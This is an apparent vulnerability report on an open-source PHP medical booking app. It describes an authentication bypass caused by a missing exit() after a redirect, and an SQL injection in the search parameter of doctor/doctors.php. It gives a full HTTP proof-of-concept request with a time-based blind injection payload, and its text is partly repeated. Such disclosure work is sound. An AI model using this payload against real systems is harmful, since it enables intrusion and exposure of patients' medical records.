This PHP-based open source project is a web application for booking medical appointments. Patients can use the platform to easily schedule appointments with their doctors, saving time and effort. The project's source code is open for anyone to use, modify, and distribute according to their needs.
doctor/doctors.php from line 26,the problem is at line 36header("location: ../login.php");,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header like Cookie: PHPSESSID=foo is not passed in http
doctor/doctors.php from line 166,The $keyword parameter is controllable, the parameter search can be passed through post, and the $keyword is not protected from sql injection, line 211 $result= $database->query($sqlmain); causes sql injection
......
......
......
if($_POST){
$keyword=$_POST["search"];
$sqlmain= "select * from doctor where docemail='$keyword' or docname='$keyword' or docname like '$keyword%' or docname like '%$keyword' or docname like '%$keyword%'";
}else{
$sqlmain= "select * from doctor order by docid desc";
}
......
......
......
$result= $database->query($sqlmain);
......
......
......
POC
POST /doctor/doctors.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/doctor/doctors.php
Upgrade-Insecure-Requests: 1
search=1' AND (SELECT 7687 FROM (SELECT(SLEEP(5)))rWjf)-- xSIp
Vulnerability file address
doctor/doctors.php
from line 26,the problem is at line 36header("location: ../login.php");
,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header likeCookie: PHPSESSID=foo
is not passed in httpdoctor/doctors.php
from line 166,The $keyword parameter is controllable, the parameter search can be passed through post, and the $keyword is not protected from sql injection, line 211$result= $database->query($sqlmain);
causes sql injectionPOC
Attack results pictures